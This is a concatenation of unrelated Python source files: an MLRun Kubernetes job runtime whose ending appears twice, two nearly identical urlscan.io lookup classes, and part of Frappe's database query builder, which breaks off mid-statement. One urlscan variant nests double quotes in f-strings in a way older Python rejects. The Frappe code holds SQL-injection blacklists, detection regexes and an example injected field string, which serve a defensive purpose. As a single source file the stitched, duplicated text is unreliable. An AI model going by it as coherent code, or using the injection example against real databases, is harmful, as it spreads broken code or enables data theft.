self.kfp: writer = AsyncLogWriter(self._db_conn, runobj) status = k8s.watch(pod_name, namespace, writer=writer) if status in ["failed", "error"]: raise RunError(f"pod exited with {status}, check logs") else: txt = f"Job is running in the background, pod: {pod_name}" logger.info(txt) runobj.status.status_text = txt return None def func_to_pod(image, runtime, extra_env, command, args, workdir): container = client.V1Container( name="base", image=image, env=extra_env + runtime.spec.env, command=[command], args=args, working_dir=workdir, image_pull_policy=runtime.spec.image_pull_policy, volume_mounts=runtime.spec.volume_mounts, resources=runtime.spec.resources, ) pod_spec = kube_resource_spec_to_pod_spec(runtime.spec, container) if runtime.spec.image_pull_secret: pod_spec.image_pull_secrets = [ client.V1LocalObjectReference(name=runtime.spec.image_pull_secret) ] return pod_spec class KubeRuntimeHandler(BaseRuntimeHandler): @staticmethod def _expect_pods_without_uid() -> bool: """ builder pods are handled as part of this runtime handler - they are not coupled to run object, therefore they don't have the uid in their labels """ return True @staticmethod def _are_resources_coupled_to_run_object() -> bool: return True @staticmethod def _get_object_label_selector(object_id: str) -> str: return f"mlrun/uid={object_id}" @staticmethod def _get_possible_mlrun_class_label_values() -> typing.List[str]: return ["build", "job"]
# Copyright 2018 Iguazio # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import typing from kubernetes import client from kubernetes.client.rest import ApiException import mlrun.api.schemas import mlrun.errors from mlrun.runtimes.base import BaseRuntimeHandler from ..builder import build_runtime from ..db import RunDBError from ..kfpops import build_op from ..model import RunObject from ..utils import get_in, logger from .base import RunError from .pod import KubeResource, kube_resource_spec_to_pod_spec from .utils import AsyncLogWriter class KubejobRuntime(KubeResource): kind = "job" _is_nested = True _is_remote = True @property def is_deployed(self): """check if the function is deployed (have a valid container)""" if self.spec.image: return True if self._is_remote_api(): db = self._get_db() try: db.get_builder_status(self, logs=False) except Exception: pass if self.spec.image: return True if self.status.state and self.status.state == "ready": return True return False def with_source_archive(self, source, pythonpath=None, pull_at_runtime=True): """load the code from git/tar/zip archive at runtime or build :param source: valid path to git, zip, or tar file, e.g. git://github.com/mlrun/something.git http://some/url/file.zip :param pythonpath: python search path relative to the archive root or absolute (e.g. './subdir') :param pull_at_runtime: load the archive into the container at job runtime vs on build/deploy """ self.spec.build.load_source_on_run = pull_at_runtime self.spec.build.source = source if pythonpath: self.spec.pythonpath = pythonpath def build_config( self, image="", base_image=None, commands: list = None, secret=None, source=None, extra=None, load_source_on_run=None, with_mlrun=None, auto_build=None, ): """specify builder configuration for the deploy operation :param image: target image name/path :param base_image: base image name/path :param commands: list of docker build (RUN) commands e.g. ['pip install pandas'] :param secret: k8s secret for accessing the docker registry :param source: source git/tar archive to load code from in to the context/workdir e.g. git://github.com/mlrun/something.git#development :param extra: extra Dockerfile lines :param load_source_on_run: load the archive code into the container at runtime vs at build time :param with_mlrun: add the current mlrun package to the container build :param auto_build: when set to True and the function require build it will be built on the first function run, use only if you dont plan on changing the build config between runs """ if image: self.spec.build.image = image if commands: if not isinstance(commands, list): raise ValueError("commands must be a string list") self.spec.build.commands = self.spec.build.commands or [] self.spec.build.commands += commands if extra: self.spec.build.extra = extra if secret: self.spec.build.secret = secret if base_image: self.spec.build.base_image = base_image if source: self.spec.build.source = source if load_source_on_run: self.spec.build.load_source_on_run = load_source_on_run if with_mlrun is not None: self.spec.build.with_mlrun = with_mlrun if auto_build: self.spec.build.auto_build = auto_build def deploy( self, watch=True, with_mlrun=None, skip_deployed=False, is_kfp=False, mlrun_version_specifier=None, builder_env: dict = None, ) -> bool: """deploy function, build container with dependencies :param watch: wait for the deploy to complete (and print build logs) :param with_mlrun: add the current mlrun package to the container build :param skip_deployed: skip the build if we already have an image for the function :param mlrun_version_specifier: which mlrun package version to include (if not current) :param builder_env: Kaniko builder pod env vars dict (for config/credentials) e.g. builder_env={"GIT_TOKEN": token} :return True if the function is ready (deployed) """ build = self.spec.build if with_mlrun is None: if build.with_mlrun is not None: with_mlrun = build.with_mlrun else: with_mlrun = build.base_image and not ( build.base_image.startswith("mlrun/") or "/mlrun/" in build.base_image ) if not build.source and not build.commands and not build.extra and with_mlrun: logger.info( "running build to add mlrun package, set " "with_mlrun=False to skip if its already in the image" ) self.status.state = "" # When we're in pipelines context we must watch otherwise the pipelines pod will exit before the operation # is actually done. (when a pipelines pod exits, the pipeline step marked as done) if is_kfp: watch = True if self._is_remote_api(): db = self._get_db() data = db.remote_builder( self, with_mlrun, mlrun_version_specifier, skip_deployed, builder_env=builder_env, ) self.status = data["data"].get("status", None) self.spec.image = get_in(data, "data.spec.image") ready = data.get("ready", False) if not ready: logger.info( f"Started building image: {data.get('data', {}).get('spec', {}).get('build', {}).get('image')}" ) if watch and not ready: state = self._build_watch(watch) ready = state == "ready" self.status.state = state else: self.save(versioned=False) ready = build_runtime( mlrun.api.schemas.AuthInfo(), self, with_mlrun, mlrun_version_specifier, skip_deployed, watch, ) self.save(versioned=False) if watch and not ready: raise mlrun.errors.MLRunRuntimeError("Deploy failed") return ready def _build_watch(self, watch=True, logs=True): db = self._get_db() offset = 0 try: text, _ = db.get_builder_status(self, 0, logs=logs) except RunDBError: raise ValueError("function or build process not found") if text: print(text) if watch: while self.status.state in ["pending", "running"]: offset += len(text) time.sleep(2) text, _ = db.get_builder_status(self, offset, logs=logs) if text: print(text, end="") return self.status.state def builder_status(self, watch=True, logs=True): if self._is_remote_api(): return self._build_watch(watch, logs) else: pod = self.status.build_pod if not self.status.state == "ready" and pod: k8s = self._get_k8s() status = k8s.get_pod_status(pod) if logs: if watch: status = k8s.watch(pod) else: resp = k8s.logs(pod) if resp: print(resp.encode()) if status == "succeeded": self.status.build_pod = None self.status.state = "ready" logger.info("build completed successfully") return "ready" if status in ["failed", "error"]: self.status.state = status logger.error(f" build {status}, watch the build pod logs: {pod}") return status logger.info(f"builder status is: {status}, wait for it to complete") return None def deploy_step( self, image=None, base_image=None, commands: list = None, secret_name="", with_mlrun=True, skip_deployed=False, ): function_name = self.metadata.name or "function" name = f"deploy_{function_name}" # mark that the function/image is built as part of the pipeline so other places # which use the function will grab the updated image/status self._build_in_pipeline = True return build_op( name, self, image=image, base_image=base_image, commands=commands, secret_name=secret_name, with_mlrun=with_mlrun, skip_deployed=skip_deployed, ) def _run(self, runobj: RunObject, execution): command, args, extra_env = self._get_cmd_args(runobj) if runobj.metadata.iteration: self.store_run(runobj) k8s = self._get_k8s() new_meta = self._get_meta(runobj) if self._secrets: if self._secrets.has_vault_source(): self._add_vault_params_to_spec(runobj) if self._secrets.has_azure_vault_source(): self._add_azure_vault_params_to_spec( self._secrets.get_azure_vault_k8s_secret() ) self._add_project_k8s_secrets_to_spec( self._secrets.get_k8s_secrets(), runobj ) else: self._add_project_k8s_secrets_to_spec(None, runobj) pod_spec = func_to_pod( self.full_image_path(), self, extra_env, command, args, self.spec.workdir ) pod = client.V1Pod(metadata=new_meta, spec=pod_spec) try: pod_name, namespace = k8s.create_pod(pod) except ApiException as exc: raise RunError(str(exc)) if pod_name and self.kfp: writer = AsyncLogWriter(self._db_conn, runobj) status = k8s.watch(pod_name, namespace, writer=writer) if status in ["failed", "error"]: raise RunError(f"pod exited with {status}, check logs") else: txt = f"Job is running in the background, pod: {pod_name}" logger.info(txt) runobj.status.status_text = txt return None def func_to_pod(image, runtime, extra_env, command, args, workdir): container = client.V1Container( name="base", image=image, env=extra_env + runtime.spec.env, command=[command], args=args, working_dir=workdir, image_pull_policy=runtime.spec.image_pull_policy, volume_mounts=runtime.spec.volume_mounts, resources=runtime.spec.resources, ) pod_spec = kube_resource_spec_to_pod_spec(runtime.spec, container) if runtime.spec.image_pull_secret: pod_spec.image_pull_secrets = [ client.V1LocalObjectReference(name=runtime.spec.image_pull_secret) ] return pod_spec class KubeRuntimeHandler(BaseRuntimeHandler): @staticmethod def _expect_pods_without_uid() -> bool: """ builder pods are handled as part of this runtime handler - they are not coupled to run object, therefore they don't have the uid in their labels """ return True @staticmethod def _are_resources_coupled_to_run_object() -> bool: return True @staticmethod def _get_object_label_selector(object_id: str) -> str: return f"mlrun/uid={object_id}" @staticmethod def _get_possible_mlrun_class_label_values() -> typing.List[str]: return ["build", "job"]
import requests from requests.exceptions import HTTPError, RequestException, Timeout from utils.termcolors import Termcolor as Tc class URLScan: def __init__(self, ip): self.headers = {"Accept": "application/json"} self.params = ( ("q", f"domain:{"".join(ip)}"), ("size", 1), ) self.base_url = "https://urlscan.io/api/v1/search/" def url_scan(self): try: resp = requests.get(self.base_url, headers=self.headers, params=self.params).json() except (HTTPError, RequestException, Timeout): print(f" {Tc.error}{Tc.dl_error} {Tc.gray}{Tc.rst}") except KeyError: print(f"{Tc.error} Issue encountered with query") else: if resp["results"]: for results in resp["results"]: for key, val in results["page"].items(): print(f"{key.title():12}: {val}") print(f"{"Result":12}: {results["result"]}\n{"Screenshot":12}: {results["screenshot"]}") else: print(Tc.clean)
import requests from requests.exceptions import HTTPError, RequestException, Timeout from utils.termcolors import Termcolor as Tc class URLScan: def __init__(self, ip): self.headers = {"Accept": "application/json"} self.params = ( ("q", f"domain:{''.join(ip)}"), ("size", 1), ) self.base_url = "https://urlscan.io/api/v1/search/" def url_scan(self): try: resp = requests.get(self.base_url, headers=self.headers, params=self.params).json() except (HTTPError, RequestException, Timeout): print(f" {Tc.error}{Tc.dl_error} {Tc.gray}{Tc.rst}") except KeyError: print(f"{Tc.error} Issue encountered with query") else: if resp["results"]: for results in resp["results"]: for key, val in results["page"].items(): print(f"{key.title():12}: {val}") print(f"{'Result':12}: {results['result']}\n{'Screenshot':12}: {results['screenshot']}") else: print(Tc.clean)
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: MIT. See LICENSE """build query for doclistview and return results""" from typing import List import frappe.defaults from frappe.query_builder.utils import Column import frappe.share from frappe import _ import frappe.permissions from datetime import datetime import frappe, json, copy, re from frappe.model import optional_fields from frappe.model.utils.user_settings import get_user_settings, update_user_settings from frappe.utils import flt, cint, get_time, make_filter_tuple, get_filter, add_to_date, cstr, get_timespan_date_range from frappe.model.meta import get_table_columns from frappe.core.doctype.server_script.server_script_utils import get_server_script_map class DatabaseQuery(object): def __init__(self, doctype, user=None): self.doctype = doctype self.tables = [] self.conditions = [] self.or_conditions = [] self.fields = None self.user = user or frappe.session.user self.ignore_ifnull = False self.flags = frappe._dict() self.reference_doctype = None def execute(self, fields=None, filters=None, or_filters=None, docstatus=None, group_by=None, order_by="KEEP_DEFAULT_ORDERING", limit_start=False, limit_page_length=None, as_list=False, with_childnames=False, debug=False, ignore_permissions=False, user=None, with_comment_count=False, join='left join', distinct=False, start=None, page_length=None, limit=None, ignore_ifnull=False, save_user_settings=False, save_user_settings_fields=False, update=None, add_total_row=None, user_settings=None, reference_doctype=None, run=True, strict=True, pluck=None, ignore_ddl=False, parent_doctype=None) -> List: if ( not ignore_permissions and not frappe.has_permission(self.doctype, "select", user=user, parent_doctype=parent_doctype) and not frappe.has_permission(self.doctype, "read", user=user, parent_doctype=parent_doctype) ): frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(self.doctype)) raise frappe.PermissionError(self.doctype) # filters and fields swappable # its hard to remember what comes first if ( isinstance(fields, dict) or ( fields and isinstance(fields, list) and isinstance(fields[0], list) ) ): # if fields is given as dict/list of list, its probably filters filters, fields = fields, filters elif fields and isinstance(filters, list) \ and len(filters) > 1 and isinstance(filters[0], str): # if `filters` is a list of strings, its probably fields filters, fields = fields, filters if fields: self.fields = fields else: self.fields = [f"`tab{self.doctype}`.`{pluck or "name"}`"] if start: limit_start = start if page_length: limit_page_length = page_length if limit: limit_page_length = limit self.filters = filters or [] self.or_filters = or_filters or [] self.docstatus = docstatus or [] self.group_by = group_by self.order_by = order_by self.limit_start = cint(limit_start) self.limit_page_length = cint(limit_page_length) if limit_page_length else None self.with_childnames = with_childnames self.debug = debug self.join = join self.distinct = distinct self.as_list = as_list self.ignore_ifnull = ignore_ifnull self.flags.ignore_permissions = ignore_permissions self.user = user or frappe.session.user self.update = update self.user_settings_fields = copy.deepcopy(self.fields) self.run = run self.strict = strict self.ignore_ddl = ignore_ddl # for contextual user permission check # to determine which user permission is applicable on link field of specific doctype self.reference_doctype = reference_doctype or self.doctype if user_settings: self.user_settings = json.loads(user_settings) self.columns = self.get_table_columns() # no table & ignore_ddl, return if not self.columns: return [] result = self.build_and_run() if with_comment_count and not as_list and self.doctype: self.add_comment_count(result) if save_user_settings: self.save_user_settings_fields = save_user_settings_fields self.update_user_settings() if pluck: return [d[pluck] for d in result] return result def build_and_run(self): args = self.prepare_args() args.limit = self.add_limit() if args.conditions: args.conditions = "where " + args.conditions if self.distinct: args.fields = 'distinct ' + args.fields args.order_by = '' # TODO: recheck for alternative # Postgres requires any field that appears in the select clause to also # appear in the order by and group by clause if frappe.db.db_type == 'postgres' and args.order_by and args.group_by: args = self.prepare_select_args(args) query = """select %(fields)s from %(tables)s %(conditions)s %(group_by)s %(order_by)s %(limit)s""" % args return frappe.db.sql(query, as_dict=not self.as_list, debug=self.debug, update=self.update, ignore_ddl=self.ignore_ddl, run=self.run) def prepare_args(self): self.parse_args() self.sanitize_fields() self.extract_tables() self.set_optional_columns() self.build_conditions() args = frappe._dict() if self.with_childnames: for t in self.tables: if t != "`tab" + self.doctype + "`": self.fields.append(t + ".name as '%s:name'" % t[4:-1]) # query dict args.tables = self.tables[0] # left join parent, child tables for child in self.tables[1:]: args.tables += f" {self.join} {child} on ({child}.parent = {self.tables[0]}.name)" if self.grouped_or_conditions: self.conditions.append(f"({" or ".join(self.grouped_or_conditions)})") args.conditions = ' and '.join(self.conditions) if self.or_conditions: args.conditions += (' or ' if args.conditions else "") + \ ' or '.join(self.or_conditions) self.set_field_tables() fields = [] # Wrapping fields with grave quotes to allow support for sql keywords # TODO: Add support for wrapping fields with sql functions and distinct keyword for field in self.fields: stripped_field = field.strip().lower() skip_wrapping = any([ stripped_field.startswith(("`", "*", '"', "'")), "(" in stripped_field, "distinct" in stripped_field, ]) if skip_wrapping: fields.append(field) elif "as" in field.lower().split(" "): col, _, new = field.split() fields.append(f"`{col}` as {new}") else: fields.append(f"`{field}`") args.fields = ", ".join(fields) self.set_order_by(args) self.validate_order_by_and_group_by(args.order_by) args.order_by = args.order_by and (" order by " + args.order_by) or "" self.validate_order_by_and_group_by(self.group_by) args.group_by = self.group_by and (" group by " + self.group_by) or "" return args def prepare_select_args(self, args): order_field = re.sub(r"\ order\ by\ |\ asc|\ ASC|\ desc|\ DESC", "", args.order_by) if order_field not in args.fields: extracted_column = order_column = order_field.replace("`", "") if "." in extracted_column: extracted_column = extracted_column.split(".")[1] args.fields += f", MAX({extracted_column}) as `{order_column}`" args.order_by = args.order_by.replace(order_field, f"`{order_column}`") return args def parse_args(self): """Convert fields and filters from strings to list, dicts""" if isinstance(self.fields, str): if self.fields == "*": self.fields = ["*"] else: try: self.fields = json.loads(self.fields) except ValueError: self.fields = [f.strip() for f in self.fields.split(",")] # remove empty strings / nulls in fields self.fields = [f for f in self.fields if f] for filter_name in ["filters", "or_filters"]: filters = getattr(self, filter_name) if isinstance(filters, str): filters = json.loads(filters) if isinstance(filters, dict): fdict = filters filters = [] for key, value in fdict.items(): filters.append(make_filter_tuple(self.doctype, key, value)) setattr(self, filter_name, filters) def sanitize_fields(self): ''' regex : ^.*[,();].* purpose : The regex will look for malicious patterns like `,`, '(', ')', '@', ;' in each field which may leads to sql injection. example : field = "`DocType`.`issingle`, version()" As field contains `,` and mysql function `version()`, with the help of regex the system will filter out this field. ''' sub_query_regex = re.compile("^.*[,();@].*") blacklisted_keywords = ['select', 'create', 'insert', 'delete', 'drop', 'update', 'case', 'show'] blacklisted_functions = ['concat', 'concat_ws', 'if', 'ifnull', 'nullif', 'coalesce', 'connection_id', 'current_user', 'database', 'last_insert_id', 'session_user', 'system_user', 'user', 'version', 'global'] def _raise_exception(): frappe.throw(_('Use of sub-query or function is restricted'), frappe.DataError) def _is_query(field): if re.compile(r"^(select|delete|update|drop|create)\s").match(field): _raise_exception() elif re.compile(r"\s*[0-9a-zA-z]*\s*( from | group by | order by | where | join )").match(field): _raise_exception() for field in self.fields: if sub_query_regex.match(field): if any(keyword in field.lower().split() for keyword in blacklisted_keywords): _raise_exception() if any(f"({keyword}" in field.lower() for keyword in blacklisted_keywords): _raise_exception() if any(f"{keyword}(" in field.lower() for keyword in blacklisted_functions): _raise_exception() if '@' in field.lower(): # prevent access to global variables _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*'").match(field): _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*,").match(field): _raise_exception() _is_query(field) if self.strict: if re.compile(r".*/\*.*").match(field): frappe.throw(_('Illegal SQL Query')) if re.compile(r".*\s(union).*\s").match(field.lower()): frappe.throw(_('Illegal SQL Query')) def extract_tables(self): """extract tables from fields""" self.tables = [f"`tab{self.doctype}`"] sql_functions = [ "dayofyear(", "extract(", "locate(", "strpos(", "count(", "sum(", "avg(", ] # add tables from fields if self.fields: for field in self.fields: if not ("tab" in field and "." in field) or any(x for x in sql_functions if x in field): continue table_name = field.split('.')[0] if table_name.lower().startswith('group_concat('): table_name = table_name[13:] if table_name.lower().startswith('ifnull('): table_name = table_name[7:] if not table_name[0]=='`': table_name = f"`{table_name}`" if not table_name in self.tables: self.append_table(table_name) def append_table(self, table_name): self.tables.append(table_name) doctype = table_name[4:-1] ptype = 'select' if frappe.only_has_select_perm(doctype) else 'read' if not self.flags.ignore_permissions and \ not frappe.has_permission(doctype, ptype=ptype, parent_doctype=self.doctype): frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(doctype)) raise frappe.PermissionError(doctype) def set_field_tables(self): '''If there are more than one table, the fieldname must not be ambiguous. If the fieldname is not explicitly mentioned, set the default table''' def _in_standard_sql_methods(field): methods = ('count(', 'avg(', 'sum(', 'extract(', 'dayofyear(') return field.lower().startswith(methods) if len(self.tables) > 1: for idx, field in enumerate(self.fields): if '.' not in field and not _in_standard_sql_methods(field): self.fields[idx] = f"{self.tables[0]}.{field}" def get_table_columns(self): try: return get_table_columns(self.doctype) except frappe.db.TableMissingError: if self.ignore_ddl: return None else: raise def set_optional_columns(self): """Removes optional columns like `_user_tags`, `_comments` etc. if not in table""" # remove from fields to_remove = [] for fld in self.fields: for f in optional_fields: if f in fld and not f in self.columns: to_remove.append(fld) for fld in to_remove: del self.fields[self.fields.index(fld)] # remove from filters to_remove = [] for each in self.filters: if isinstance(each, str): each = [each] for element in each: if element in optional_fields and element not in self.columns: to_remove.append(each) for each in to_remove: if isinstance(self.filters, dict): del self.filters[each] else: self.filters.remove(each) def build_conditions(self): self.conditions = [] self.grouped_or_conditions = [] self.build_filter_conditions(self.filters, self.conditions) self.build_filter_conditions(self.or_filters, self.grouped_or_conditions) # match conditions if not self.flags.ignore_permissions: match_conditions = self.build_match_conditions() if match_conditions: self.conditions.append(f"({match_conditions})") def build_filter_conditions(self, filters, conditions, ignore_permissions=None): """build conditions from user filters""" if ignore_permissions is not None: self.flags.ignore_permissions = ignore_permissions if isinstance(filters, dict): filters = [filters] for f in filters: if isinstance(f, str): conditions.append(f) else: conditions.append(self.prepare_filter_condition(f)) def prepare_filter_condition(self, f): """Returns a filter condition in the format: ifnull(`tabDocType`.`fieldname`, fallback) operator "value" """ from frappe.boot import get_additional_filters_from_hooks additional_filters_config = get_additional_filters_from_hooks() f = get_filter(self.doctype, f, additional_filters_config) tname = ('`tab' + f.doctype + '`') if not tname in self.tables: self.append_table(tname) if 'ifnull(' in f.fieldname: column_name = f.fieldname else: column_name = f"{tname}.{f.fieldname}" can_be_null = True if f.operator.lower() in additional_filters_config: f.update(get_additional_filter_field(additional_filters_config, f, f.value)) # prepare in condition if f.operator.lower() in ('ancestors of', 'descendants of', 'not ancestors of', 'not descendants of'): values = f.value or '' # TODO: handle list and tuple # if not isinstance(values, (list, tuple)): # values = values.split(",") ref_doctype = f.doctype if frappe.get_meta(f.doctype).get_field(f.fieldname) is not None : ref_doctype = frappe.get_meta(f.doctype).get_field(f.fieldname).options result=[] lft, rgt = '', '' if f.value: lft, rgt = frappe.db.get_value(ref_doctype, f.value, ["lft", "rgt"]) # Get descendants elements of a DocType with a tree structure if f.operator.lower() in ('descendants of', 'not descendants of') : result = frappe.get_all(ref_doctype, filters={ 'lft': ['>', lft], 'rgt': ['<', rgt] }, order_by='`lft` ASC') else : # Get ancestor elements of a DocType with a tree structure result = frappe.get_all(ref_doctype, filters={ 'lft': ['<', lft], 'rgt': ['>', rgt] }, order_by='`lft` DESC') fallback = "''" value = [frappe.db.escape((v.name or '').strip(), percent=False) for v in result] if len(value): value = f"({", ".join(value)})" else: value = "('')" # changing operator to IN as the above code fetches all the parent / child values and convert into tuple # which can be directly used with IN operator to query. f.operator = 'not in' if f.operator.lower() in ('not ancestors of', 'not descendants of') else 'in' elif f.operator.lower() in ('in', 'not in'): values = f.value or '' if isinstance(values, str): values = values.split(",") fallback = "''" value = [frappe.db.escape((v or '').strip(), percent=False) for v in values] if len(value): value = f"({", ".join(value)})" else: value = "('')" else: df = frappe.get_meta(f.doctype).get("fields", {"fieldname": f.fieldname}) df = df[0] if df else None if df and df.fieldtype in ("Check", "Float", "Int", "Currency", "Percent"): can_be_null = False if f.operator.lower() in ('previous', 'next', 'timespan'): date_range = get_date_range(f.operator.lower(), f.value) f.operator = "Between" f.value = date_range fallback = "'0001-01-01 00:00:00'" if f.operator in ('>', '<') and (f.fieldname in ('creation', 'modified')): value = cstr(f.value) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() in ('between') and \ (f.fieldname in ('creation', 'modified') or (df and (df.fieldtype=="Date" or df.fieldtype=="Datetime"))): value = get_between_date_filter(f.value, df) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() == "is": if f.value == 'set': f.operator = '!=' elif f.value == 'not set': f.operator = '=' value = "" fallback = "''" can_be_null = True if 'ifnull' not in column_name: column_name = f'ifnull({column_name}, {fallback})' elif df and df.fieldtype=="Date": value = frappe.db.format_date(f.value) fallback = "'0001-01-01'" elif (df and df.fieldtype=="Datetime") or isinstance(f.value, datetime): value = frappe.db.format_datetime(f.value) fallback = "'0001-01-01 00:00:00'" elif df and df.fieldtype=="Time": value = get_time(f.value).strftime("%H:%M:%S.%f") fallback = "'00:00:00'" elif f.operator.lower() in ("like", "not like") or (isinstance(f.value, str) and (not df or df.fieldtype not in ["Float", "Int", "Currency", "Percent", "Check"])): value = "" if f.value is None else f.value fallback = "''" if f.operator.lower() in ("like", "not like") and isinstance(value, str): # because "like" uses backslash (\) for escaping value = value.replace("\\", "\\\\").replace("%", "%%") elif f.operator == '=' and df and df.fieldtype in ['Link', 'Data']: # TODO: Refactor if possible value = f.value or "''" fallback = "''" elif f.fieldname == 'name': value = f.value or "''" fallback = "''" else: value = flt(f.value) fallback = 0 if isinstance(f.value, Column): can_be_null = False # added to avoid the ifnull/coalesce addition quote = '"' if frappe.conf.db_type == 'postgres' else "`" value = f"{tname}.{quote}{f.value.name}{quote}" # escape value elif isinstance(value, str) and not f.operator.lower() == 'between': value = f"{frappe.db.escape(value, percent=False)}" if ( self.ignore_ifnull or not can_be_null or (f.value and f.operator.lower() in ('=', 'like')) or 'ifnull(' in column_name.lower() ): if f.operator.lower() == 'like' and frappe.conf.get('db_type') == 'postgres': f.operator = 'ilike' condition = f'{column_name} {f.operator} {value}' else: condition = f'ifnull({column_name}, {fallback}) {f.operator} {value}' return condition def build_match_conditions(self, as_condition=True): """add match conditions if applicable""" self.match_filters = [] self.match_conditions = [] only_if_shared = False if not self.user: self.user = frappe.session.user if not self.tables: self.extract_tables() meta = frappe.get_meta(self.doctype) role_permissions = frappe.permissions.get_role_permissions(meta, user=self.user) self.shared = frappe.share.get_shared(self.doctype, self.user) if ( not meta.istable and not (role_permissions.get("select") or role_permissions.get("read")) and not self.flags.ignore_permissions and not has_any_user_permission_for_doctype(self.doctype, self.user, self.reference_doctype) ): only_if_shared = True if not self.shared: frappe.throw(_("No permission to read {0}").format(self.doctype), frappe.PermissionError) else: self.conditions.append(self.get_share_condition()) else: # skip user perm check if owner constraint is required if requires_owner_constraint(role_permissions): self.match_conditions.append( f"`tab{self.doctype}`.`owner` = {frappe.db.escape(self.user, percent=False)}" ) # add user permission only if role has read perm elif role_permissions.get("read") or role_permissions.get("select"): # get user permissions user_permissions = frappe.permissions.get_user_permissions(self.user) self.add_user_permissions(user_permissions) if as_condition: conditions = "" if self.match_conditions: # will turn out like ((blog_post in (..) and blogger in (...)) or (blog_category in (...))) conditions = "((" + ") or (".join(self.match_conditions) + "))" doctype_conditions = self.get_permission_query_conditions() if doctype_conditions: conditions += (' and ' + doctype_conditions) if conditions else doctype_conditions # share is an OR condition, if there is a role permission if not only_if_shared and self.shared and conditions: conditions = f"({conditions}) or ({self.get_share_condition()})" return conditions else: return self.match_filters def get_share_condition(self): return f"`tab{self.doctype}`.name in ({", ".join(frappe.db.escape(s, percent=False) for s in self.shared)})" def add_user_permissions(self, user_permissions): meta = frappe.get_meta(self.doctype) doctype_link_fields = [] doctype_link_fields = meta.get_link_fields() # append current doctype with fieldname as 'name' as first link field doctype_link_fields.append(dict( options=self.doctype, fieldname='name', )) match_filters = {} match_conditions = [] for df in doctype_link_fields: if df.get('ignore_user_permissions'): continue user_permission_values = user_permissions.get(df.get('options'), {}) if user_permission_values: docs = [] if frappe.get_system_settings("apply_strict_user_permissions"): condition = "" else: empty_value_condition = f"ifnull(`tab{self.doctype}`.`{df.get("fieldname")}`, '')=''" condition = empty_value_condition + " or " for permission in user_permission_values: if not permission.get('applicable_for'): docs.append(permission.get('doc')) # append docs based on user permission applicable on reference doctype # this is useful when getting list of docs from a link field # in this case parent doctype of the link # will be the reference doctype elif df.get('fieldname') == 'name' and self.reference_doctype: if permission.get('applicable_for') == self.reference_doctype: docs.append(permission.get('doc')) elif permission.get('applicable_for') == self.doctype: docs.append(permission.get('doc')) if docs: values = ", ".join(frappe.db.escape(doc, percent=False) for doc in docs) condition += f"`tab{self.doctype}`.`{df.get("fieldname")}` in ({values})" match_conditions.append(f"({condition})") match_filters[df.get('options')] = docs if match_conditions: self.match_conditions.append(" and ".join(match_conditions)) if match_filters: self.match_filters.append(match_filters) def get_permission_query_conditions(self): conditions = [] condition_methods = frappe.get_hooks("permission_query_conditions", {}).get(self.doctype, []) if condition_methods: for method in condition_methods: c = frappe.call(frappe.get_attr(method), self.user) if c: conditions.append(c) permision_script_name = get_server_script_map().get("permission_query", {}).get(self.doctype) if permision_script_name: script = frappe.get_doc("Server Script", permision_script_name) condition = script.get_permission_query_conditions(self.user) if condition: conditions.append(condition) return " and ".join(conditions) if conditions else "" def set_order_by(self, args): meta = frappe.get_meta(self.doctype) if self.order_by and self.order_by != "KEEP_DEFAULT_ORDERING": args.order_by = self.order_by else: args.order_by = "" # don't add order by from meta if a mysql group function is used without group by clause group_function_without_group_by = (len(self.fields)==1 and ( self.fields[0].lower().startswith("count(") or self.fields[0].lower().startswith("min(") or self.fields[0].lower().startswith("max(") ) and not self.group_by) if not group_function_without_group_by: sort_field = sort_order = None if meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc args.order_by = ', '.join( f"`tab{self.doctype}`.`{f.split()[0].strip()}` {f.split()[1].strip()}" for f in meta.sort_field.split(',') ) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' if self.order_by: args.order_by = f"`tab{self.doctype}`.`{sort_field or "modified"}` {sort_order or "desc"}" # draft docs always on top if hasattr(meta, 'is_submittable') and meta.is_submittable: if self.order_by: args.order_by = f"`tab{self.doctype}`.docstatus asc, {args.order_by}" def validate_order_by_and_group_by(self, parameters): """Check order by, group by so that atleast one column is selected and does not have subquery""" if not parameters: return _lower = parameters.lower() if 'select' in _lower and 'from' in _lower: frappe.throw(_('Cannot use sub-query in order by')) if re.compile(r".*[^a-z0-9-_ ,`'\"\.\(\)].*").match(_lower): frappe.throw(_('Illegal SQL Query')) for field in parameters.split(","): if "." in field and field.strip().startswith("`tab"): tbl = field.strip().split('.')[0] if tbl not in self.tables: if tbl.startswith('`'): tbl = tbl[4:-1] frappe.throw(_("Please select atleast 1 column from {0} to sort/group").format(tbl)) def add_limit(self): if self.limit_page_length: return 'limit %s offset %s' % (self.limit_page_length, self.limit_start) else: return '' def add_comment_count(self, result): for r in result: if not r.name: continue r._comment_count = 0 if "_comments" in r: r._comment_count = len(json.loads(r._comments or "[]")) def update_user_settings(self): # update user settings if new search user_settings = json.loads(get_user_settings(self.doctype)) if hasattr(self, 'user_settings'): user_settings.update(self.user_settings) if self.save_user_settings_fields: user_settings['fields'] = self.user_settings_fields update_user_settings(self.doctype, user_settings) def check_parent_permission(parent, child_doctype): if parent: # User may pass fake parent and get the information from the child table if child_doctype and not ( frappe.db.exists('DocField', {'parent': parent, 'options': child_doctype}) or frappe.db.exists('Custom Field', {'dt': parent, 'options': child_doctype}) ): raise frappe.PermissionError if frappe.permissions.has_permission(parent): return # Either parent not passed or the user doesn't have permission on parent doctype of child table! raise frappe.PermissionError def get_order_by(doctype, meta): order_by = "" sort_field = sort_order = None if meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc order_by = ', '.join(f"`tab{doctype}`.`{f.split()[0].strip()}` 